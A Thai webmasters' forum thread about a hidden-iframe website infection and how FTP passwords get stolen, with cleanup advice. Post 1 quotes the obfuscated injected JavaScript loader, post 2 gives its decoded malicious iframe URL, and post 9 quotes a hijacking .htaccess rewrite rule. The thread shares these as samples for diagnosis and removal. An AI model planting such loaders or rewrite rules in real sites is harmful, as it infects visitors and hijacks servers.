Iframe หรือไม่

Technical topics
1 
<?php
$frame_code = '<script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script>';

function get_file_dir_($file) {
2

iframe แน่นอนครับ

<iframe id="PzuNOYDH" src="http://sites-counter.com/user/174/in.php" class="apcdqYgApH"></iframe>
3

ผมรู้สึกว่ามันจะติดจากการเข้าwebบางweb แล้วถ้าเปิดโปรแกรม ftp ไว้ หรือ save userและ password ในโปรแกรม ftp หลังจากนั้น webผมมักจะมี iframe ติดมาประจำเลยครับ
ไม่ทราบว่าใช้โปรแกรม ftp อะไรครับ
อยากให้ช่วยlistชื่อโปรแกรม ftpที่ใช้กันครับ จะได้หาตัวที่ไม่น่าจะติดไวรัสได้ รำคาญจริงๆ ฆ่าไม่หมดซักที

ผมใช้แล้วโดนนะครับ
1.WS_FTP LE
2.FileZilla

4

ถ้าเครื่องคุณติดไวรัส ไม่ว่าใช้ตัวไหนก็โดนละค้าบบ
ส่วนตัวผม ผมใช้filezilla

5

:smash: :smash:

6

คือผมอยากรู้ว่าตัวไหน มันเก็บpassword ได้ดีที่สุดครับ
เพราะถ้าเป็นตัว WS_FTP LE มันเก็บไว้ใน ini โดยสามารถ copy ไปใช้ได้เลย
ส่วน Filezilla เก็บไว้เป็น xml
ผมว่ามันน่าจะมีตัวที่เข้ารหัสดีๆที่ virus มันไปดึงข้อมูลมาไม่ได้อ่ะครับ ต่อให้ติดไวรัส ถ้ามันอ่านไฟล์ config ของ ftpไม่ออก ก็ไม่น่าจะ up file มาทับเราได้
นอกจากมันจะมี ไฟล์ php ซ่อนอยู่ใน host เราอยู่แล้ว แต่ผมดู log แล้วส่วนใหญ่จะมาจาก ftpทั้งนั้นเลยครับ

7

ง่ายๆ แบบไม่ต้องคิดมากค้าบบบ

เขียนเก็บไว้บนกระดาษค้าบบบ

8

ตราบใดที่ยังใช้ port 21 ติด trojan เมื่อเหรื่อก็โดนแน่นอนครับ
ใช้ winscp ดีกว่าครับ :slight_smile:

9

เราๆ ท่านๆ ใช้ winscp ก็คงไม่ยากครับแต่ user ทั่วไปเนี่ยซิ
อย่างรายที่เจอ ใช้ ftp ผ่านจาก IE มาเลย
ไม่ใช่ file PE03F3EC051C74.php file เดียวน่ะครับพวกมาด้วย .htaccess พร้อมเลย

#F7C6ABEE4703{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml)	PEF7C6ABEE4703.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#F7C6ABEE4703}
10

อัพเดท filezilla ตัวล่าสุดครับ มันไม่เก็บแบบ xml แล้ว

11

สองไฟล์นี้ มันต้องใช้ร่วมกันครับ ถ้าเจอไฟล์แรก ก็มองหา .htaccess ได้เลย
Windows Server ก็สบายไป

12

โอ้ว จริงหรอครับ พัฒนาแล้ว : )

13

Filezilla ผมใช้ไม่โดนนะ เพราะผมใช้ MacBook อิอิ จริงๆ ใช้อะไรก็ไม่โดนหรอก

14

อันดับแรกเลยนี่ผมว่าเริ่มหันมาใช้บราเซอร์ที่ปลอดภัยนี่ก็โอเคระดับหนึ่งแล้วครับ
เพราะว่ามีหลายที่ พอเข้าด้วย firefox เข้าไม่ได้มันฟ้องเตือน ก็เลยไปเอา IE เข้าเพราะว่ามันเข้าได้ เท่านั้นแหละครับมันก็เริ่มทำงานระบาดกันทั่ว

15

ของพี่ธี รู้สึกว่าจะเป็นตัว iframe ตัวแม่ เลยล่ะครับ

โค้ดมัน น่าเอาไว้ reverse เวลาโดนไวัรส ไปแล้วจริงๆ

16

เพิ่งว่างมานั่งดู code มันไปเขียนไฟล์อื่น ใช้ fizscript scan ได้
reset password ftp
แล้วลบไฟล์นี้ออก แก้ .htaccess ครับ

หากจะให้ดีต้องไม่ใจง่้าย ตั้ง permission ให้มันเข้าท่าครับ

17